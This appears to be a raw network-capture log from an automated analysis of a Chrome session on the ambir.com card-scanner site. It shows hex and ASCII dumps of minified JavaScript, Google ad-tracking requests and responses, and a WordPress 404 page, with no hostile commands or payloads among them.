                                                                                                                                                                                              2024-11-20 20:28:34 UTC16383INData Raw: 21 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 6f 2c 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 73 2c 61 29 7b 69 66 28 21 6f 5b 73 5d 29 7b 69 66 28 21 74 5b 73 5d 29 7b 76 61 72 20 6c 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 26 26 72 65 71 75 69 72 65 3b 69 66 28 21 61 26 26 6c 29 72 65 74 75 72 6e 20 6c 28 73 2c 21 30 29 3b 69 66 28 69 29 72 65 74 75 72 6e 20 69 28 73 2c 21 30 29 3b 76 61 72 20 63 3d 6e 65 77 20 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 6d 6f 64 75 6c 65 20 27 22 2b 73 2b 22 27 22 29 3b 74 68 72 6f 77 20 63 2e 63 6f 64 65 3d 22 4d 4f 44 55 4c 45 5f 4e 4f 54 5f 46 4f 55 4e 44 22 2c 63 7d 76 61 72 20 75 3d 6f 5b 73 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 74 5b 73 5d 5b 30 5d 2e 63 61
                                                                                                                                                                                              Data Ascii: !function e(t,o,n){function r(s,a){if(!o[s]){if(!t[s]){var l="function"==typeof require&&require;if(!a&&l)return l(s,!0);if(i)return i(s,!0);var c=new Error("Cannot find module '"+s+"'");throw c.code="MODULE_NOT_FOUND",c}var u=o[s]={exports:{}};t[s][0].ca
                                                                                                                                                                                              2024-11-20 20:28:34 UTC16383INData Raw: 66 74 28 29 29 29 2c 6f 2e 73 65 61 72 63 68 3d 65 2e 73 65 61 72 63 68 2c 6f 2e 71 75 65 72 79 3d 65 2e 71 75 65 72 79 2c 63 2e 69 73 4e 75 6c 6c 28 6f 2e 70 61 74 68 6e 61 6d 65 29 26 26 63 2e 69 73 4e 75 6c 6c 28 6f 2e 73 65 61 72 63 68 29 7c 7c 28 6f 2e 70 61 74 68 3d 28 6f 2e 70 61 74 68 6e 61 6d 65 3f 6f 2e 70 61 74 68 6e 61 6d 65 3a 22 22 29 2b 28 6f 2e 73 65 61 72 63 68 3f 6f 2e 73 65 61 72 63 68 3a 22 22 29 29 2c 6f 2e 68 72 65 66 3d 6f 2e 66 6f 72 6d 61 74 28 29 2c 6f 3b 69 66 28 21 62 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 6f 2e 70 61 74 68 6e 61 6d 65 3d 6e 75 6c 6c 2c 6f 2e 73 65 61 72 63 68 3f 6f 2e 70 61 74 68 3d 22 2f 22 2b 6f 2e 73 65 61 72 63 68 3a 6f 2e 70 61 74 68 3d 6e 75 6c 6c 2c 6f 2e 68 72 65 66 3d 6f 2e 66 6f 72 6d 61 74 28
                                                                                                                                                                                              Data Ascii: ft())),o.search=e.search,o.query=e.query,c.isNull(o.pathname)&&c.isNull(o.search)||(o.path=(o.pathname?o.pathname:"")+(o.search?o.search:"")),o.href=o.format(),o;if(!b.length)return o.pathname=null,o.search?o.path="/"+o.search:o.path=null,o.href=o.format(
                                                                                                                                                                                              2024-11-20 20:28:34 UTC16383INData Raw: 61 6c 6c 28 61 2e 70 6c 75 67 69 6e 73 2e 6c 65 6e 67 74 68 3f 61 2e 70 6c 75 67 69 6e 73 3a 5b 5d 29 7d 63 61 74 63 68 28 65 29 7b 69 3d 5b 5d 7d 66 6f 72 28 76 61 72 20 77 3d 22 22 3b 69 2e 6c 65 6e 67 74 68 3b 29 7b 76 61 72 20 79 3d 69 2e 70 6f 70 28 29 3b 79 2e 6e 61 6d 65 26 26 28 77 2b 3d 79 2e 6e 61 6d 65 29 2c 79 2e 64 65 73 63 72 69 70 74 69 6f 6e 26 26 28 77 2b 3d 79 2e 64 65 73 63 72 69 70 74 69 6f 6e 29 2c 79 2e 76 65 72 73 69 6f 6e 26 26 28 77 2b 3d 79 2e 76 65 72 73 69 6f 6e 29 7d 76 61 72 20 62 3d 30 3b 22 22 21 3d 3d 77 26 26 28 62 3d 6f 28 77 29 29 3b 76 61 72 20 6b 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 67 2f 33 29 2c 49 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 67 2f 34 29 3b 6c 28 29 26 26 28 6b 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 67 2f 32 29
                                                                                                                                                                                              Data Ascii: all(a.plugins.length?a.plugins:[])}catch(e){i=[]}for(var w="";i.length;){var y=i.pop();y.name&&(w+=y.name),y.description&&(w+=y.description),y.version&&(w+=y.version)}var b=0;""!==w&&(b=o(w));var k=Math.floor(g/3),I=Math.floor(g/4);l()&&(k=Math.floor(g/2)
                                                                                                                                                                                              2024-11-20 20:28:34 UTC7926INData Raw: 74 65 6d 2e 70 61 74 68 22 3a 41 2e 73 65 74 50 61 74 68 28 74 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 73 79 73 74 65 6d 2e 64 6f 6d 61 69 6e 22 3a 41 2e 73 65 74 44 6f 6d 61 69 6e 28 74 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 73 79 73 74 65 6d 2e 72 65 71 75 69 72 65 5f 73 65 63 75 72 65 5f 63 6f 6f 6b 69 65 73 22 3a 41 2e 73 65 74 53 65 63 75 72 65 28 74 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 73 79 73 74 65 6d 2e 61 6c 6c 6f 77 65 64 5f 64 6f 6d 61 69 6e 73 22 3a 69 66 28 74 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 61 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 73 6f 72 74 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 2e 6c 65 6e 67 74 68 2d 65 2e 6c 65 6e 67 74 68 7d 29 3b 66 6f 72 28 76 61 72 20 74 3d 73 2e 67 65 74 57 69 6e 64 6f
                                                                                                                                                                                              Data Ascii: tem.path":A.setPath(t);break;case"system.domain":A.setDomain(t);break;case"system.require_secure_cookies":A.setSecure(t);break;case"system.allowed_domains":if(t.length){var a=function(e){e.sort(function(e,t){return t.length-e.length});for(var t=s.getWindo


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              132192.168.2.549879172.217.21.364431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:34 UTC1164OUTGET /pagead/1p-user-list/1070729751/?random=1732134501018&cv=11&fst=1732132800000&bg=ffffff&guid=ON&async=1&gtm=45be4bj0v9180601725za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081485&u_w=1280&u_h=1024&url=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&hn=www.googleadservices.com&frm=0&tiba=Ambir%20Card%20Scanners%20-%20AMBIR%20Technology&npa=0&pscdl=noapi&auid=1093817975.1732134501&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7d1SlNRPFvX_ESY-YlKzOQAPb8Frqnwu7evj9JK9Nc3KMSflbX&random=1339105251&rmt_tld=0&ipr=y HTTP/1.1
                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:35 UTC602INHTTP/1.1 200 OK
                                                                                                                                                                                              P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:35 GMT
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                              Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                              Content-Type: image/gif
                                                                                                                                                                                              Content-Security-Policy: script-src 'none'; object-src 'none'
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              Server: cafe
                                                                                                                                                                                              Content-Length: 42
                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              2024-11-20 20:28:35 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                              Data Ascii: GIF89a!,D;


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              133192.168.2.549880142.250.181.344431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:34 UTC1300OUTGET /pagead/viewthroughconversion/1070729751/?random=1732134510409&cv=11&fst=1732134510409&bg=ffffff&guid=ON&async=1&gtm=45be4bj0v9180601725z8833545045za201zb833545045&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081485&u_w=1280&u_h=1024&url=https%3A%2F%2Fambir.com%2Fambir-card-scanners%2F&hn=www.googleadservices.com&frm=0&tiba=Verify%20You%20Are%20Human&npa=0&pscdl=noapi&auid=1093817975.1732134501&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&rfmt=3&fmt=4 HTTP/1.1
                                                                                                                                                                                              Host: googleads.g.doubleclick.net
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                              Referer: https://ambir.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              Cookie: IDE=AHWqTUmoPit_wuKy5uGRDlv_X4wH6-FpAjFhJzRLblBcJp6k4iBGwdMdGwKz_xDr
                                                                                                                                                                                              2024-11-20 20:28:35 UTC703INHTTP/1.1 200 OK
                                                                                                                                                                                              P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:35 GMT
                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                              Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                              Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                              Server: cafe
                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              2024-11-20 20:28:35 UTC687INData Raw: 31 32 62 39 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 73 20 3d 20 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 61 2c 63 29 7b 69 66 28 62 3d 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 62 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 62 3b 62 5b 61 5d 3d 63 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 62 7d 3b 66 75 6e 63 74 69 6f 6e 20 6b 28 62 29 7b 62 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c
                                                                                                                                                                                              Data Ascii: 12b9(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(b,a,c){if(b==Array.prototype||b==Object.prototype)return b;b[a]=c.value;return b};function k(b){b=["object"==typeof globalThis&&global
                                                                                                                                                                                              2024-11-20 20:28:35 UTC1390INData Raw: 22 2e 22 29 3b 62 3d 64 2e 6c 65 6e 67 74 68 3d 3d 3d 31 3b 76 61 72 20 65 3d 64 5b 30 5d 2c 67 3b 21 62 26 26 65 20 69 6e 20 71 3f 67 3d 71 3a 67 3d 6d 3b 66 6f 72 28 65 3d 30 3b 65 3c 64 2e 6c 65 6e 67 74 68 2d 31 3b 65 2b 2b 29 7b 76 61 72 20 66 3d 64 5b 65 5d 3b 69 66 28 21 28 66 20 69 6e 20 67 29 29 62 72 65 61 6b 20 61 3b 67 3d 67 5b 66 5d 7d 64 3d 64 5b 64 2e 6c 65 6e 67 74 68 2d 31 5d 3b 63 3d 6e 26 26 63 3d 3d 3d 22 65 73 36 22 3f 67 5b 64 5d 3a 6e 75 6c 6c 3b 61 3d 61 28 63 29 3b 61 21 3d 6e 75 6c 6c 26 26 28 62 3f 68 28 71 2c 64 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 61 7d 29 3a 61 21 3d 3d 63 26 26 28 74 5b 64 5d 3d 3d 3d 76 6f 69 64 20 30 26 26 28 62 3d 4d 61 74 68 2e 72 61
                                                                                                                                                                                              Data Ascii: ".");b=d.length===1;var e=d[0],g;!b&&e in q?g=q:g=m;for(e=0;e<d.length-1;e++){var f=d[e];if(!(f in g))break a;g=g[f]}d=d[d.length-1];c=n&&c==="es6"?g[d]:null;a=a(c);a!=null&&(b?h(q,d,{configurable:!0,writable:!0,value:a}):a!==c&&(t[d]===void 0&&(b=Math.ra
                                                                                                                                                                                              2024-11-20 20:28:35 UTC1390INData Raw: 31 29 3b 61 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 61 2e 6f 6e 6c 6f 61 64 3d 6e 75 6c 6c 7d 3b 61 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 61 2e 6f 6e 65 72 72 6f 72 3d 6e 75 6c 6c 7d 3b 61 2e 73 72 63 3d 62 7d 3b 76 61 72 20 46 2c 47 3b 61 3a 7b 66 6f 72 28 76 61 72 20 48 3d 5b 22 43 4c 4f 53 55 52 45 5f 46 4c 41 47 53 22 5d 2c 49 3d 78 2c 4a 3d 30 3b 4a 3c 48 2e 6c 65 6e 67 74 68 3b 4a 2b 2b 29 69 66 28 49 3d 49 5b 48 5b 4a 5d 5d 2c 49 3d 3d 6e 75 6c 6c 29 7b 47 3d 6e 75 6c 6c 3b 62 72 65 61 6b 20 61 7d 47 3d 49 7d 76 61 72 20 4b 3d 47 26 26 47 5b 36 31 30 34 30 31 33 30 31 5d 3b 46 3d 4b 21 3d 6e 75 6c 6c 3f 4b 3a 21 31 3b 76 61 72 20 4c 2c 4d 3d 78 2e 6e 61 76 69 67 61 74 6f 72 3b 4c 3d 4d 3f 4d 2e 75 73 65 72 41
                                                                                                                                                                                              Data Ascii: 1);a.onload=function(){a.onload=null};a.onerror=function(){a.onerror=null};a.src=b};var F,G;a:{for(var H=["CLOSURE_FLAGS"],I=x,J=0;J<H.length;J++)if(I=I[H[J]],I==null){G=null;break a}G=I}var K=G&&G[610401301];F=K!=null?K:!1;var L,M=x.navigator;L=M?M.userA
                                                                                                                                                                                              2024-11-20 20:28:35 UTC1334INData Raw: 73 72 63 7c 7c 28 70 3d 72 29 3b 70 7c 7c 28 70 3d 6e 65 77 20 49 6d 61 67 65 2c 64 26 26 64 5b 66 2e 67 5d 26 26 28 70 2e 6f 6e 65 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 45 28 64 5b 6c 2e 67 5d 29 26 26 65 28 29 7d 7d 28 66 29 29 29 3b 70 2e 6f 6e 6c 6f 61 64 3d 65 3b 70 2e 73 72 63 3d 63 5b 66 2e 67 5d 7d 65 28 29 7d 76 61 72 20 56 3d 5b 22 73 73 5f 22 5d 2c 57 3d 73 7c 7c 78 3b 20 56 5b 30 5d 69 6e 20 57 7c 7c 74 79 70 65 6f 66 20 57 2e 65 78 65 63 53 63 72 69 70 74 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 7c 7c 57 2e 65 78 65 63 53 63 72 69 70 74 28 22 76 61 72 20 22 2b 56 5b 30 5d 29 3b 66 6f 72 28 76 61 72 20 58 3b 56 2e 6c 65 6e 67 74 68 26 26 28 58 3d 56 2e 73 68 69 66 74 28 29 29 3b
                                                                                                                                                                                              Data Ascii: src||(p=r);p||(p=new Image,d&&d[f.g]&&(p.onerror=function(l){return function(){E(d[l.g])&&e()}}(f)));p.onload=e;p.src=c[f.g]}e()}var V=["ss_"],W=s||x; V[0]in W||typeof W.execScript=="undefined"||W.execScript("var "+V[0]);for(var X;V.length&&(X=V.shift());
                                                                                                                                                                                              2024-11-20 20:28:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              134192.168.2.549882141.193.213.104431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:34 UTC1906OUTGET /cart.json HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Referer: https://ambir.com/ambir-card-scanners/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F117.0.0.0%20Safari%2F53 [TRUNCATED]
                                                                                                                                                                                              2024-11-20 20:28:35 UTC792INHTTP/1.1 404 Not Found
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:35 GMT
                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                              Link: <https://ambir.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                              WPO-Cache-Status: not cached
                                                                                                                                                                                              WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404)
                                                                                                                                                                                              X-Powered-By: WP Engine
                                                                                                                                                                                              X-Cacheable: non200
                                                                                                                                                                                              Cache-Control: max-age=600, must-revalidate
                                                                                                                                                                                              X-Cache: HIT: 2
                                                                                                                                                                                              X-Cache-Group: normal
                                                                                                                                                                                              X-Orig-Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2ff02e3b8c99-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:35 UTC577INData Raw: 37 63 39 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69
                                                                                                                                                                                              Data Ascii: 7c98<!doctype html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /> <link rel="preconnect" href="https://fonts.googleapis.com"><link rel="preconnect" href="https://fonts.gstati
                                                                                                                                                                                              2024-11-20 20:28:35 UTC1369INData Raw: 65 22 20 64 61 74 61 2d 70 61 67 65 73 70 65 65 64 2d 6e 6f 2d 64 65 66 65 72 3e 0a 09 76 61 72 20 67 74 6d 34 77 70 5f 64 61 74 61 6c 61 79 65 72 5f 6e 61 6d 65 20 3d 20 22 64 61 74 61 4c 61 79 65 72 22 3b 0a 09 76 61 72 20 64 61 74 61 4c 61 79 65 72 20 3d 20 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0a 09 63 6f 6e 73 74 20 67 74 6d 34 77 70 5f 75 73 65 5f 73 6b 75 5f 69 6e 73 74 65 61 64 20 3d 20 66 61 6c 73 65 3b 0a 09 63 6f 6e 73 74 20 67 74 6d 34 77 70 5f 63 75 72 72 65 6e 63 79 20 3d 20 27 55 53 44 27 3b 0a 09 63 6f 6e 73 74 20 67 74 6d 34 77 70 5f 70 72 6f 64 75 63 74 5f 70 65 72 5f 69 6d 70 72 65 73 73 69 6f 6e 20 3d 20 66 61 6c 73 65 3b 0a 09 63 6f 6e 73 74 20 67 74 6d 34 77 70 5f 63 6c 65 61 72 5f 65 63 6f 6d 6d 65 72 63 65 20 3d 20 66 61
                                                                                                                                                                                              Data Ascii: e" data-pagespeed-no-defer>var gtm4wp_datalayer_name = "dataLayer";var dataLayer = dataLayer || [];const gtm4wp_use_sku_instead = false;const gtm4wp_currency = 'USD';const gtm4wp_product_per_impression = false;const gtm4wp_clear_ecommerce = fa
                                                                                                                                                                                              2024-11-20 20:28:35 UTC1369INData Raw: 70 73 3a 2f 2f 61 6d 62 69 72 2e 63 6f 6d 2f 22 2c 22 6c 6f 67 6f 22 3a 7b 22 40 74 79 70 65 22 3a 22 49 6d 61 67 65 4f 62 6a 65 63 74 22 2c 22 69 6e 4c 61 6e 67 75 61 67 65 22 3a 22 65 6e 2d 55 53 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6d 62 69 72 2e 63 6f 6d 2f 23 2f 73 63 68 65 6d 61 2f 6c 6f 67 6f 2f 69 6d 61 67 65 2f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6d 62 69 72 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 38 2f 41 6d 62 69 72 5f 6c 6f 67 6f 5f 32 32 2e 70 6e 67 22 2c 22 63 6f 6e 74 65 6e 74 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 61 6d 62 69 72 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 38 2f 41 6d 62 69 72 5f 6c 6f 67 6f
                                                                                                                                                                                              Data Ascii: ps://ambir.com/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https://ambir.com/#/schema/logo/image/","url":"https://ambir.com/wp-content/uploads/2023/08/Ambir_logo_22.png","contentUrl":"https://ambir.com/wp-content/uploads/2023/08/Ambir_logo
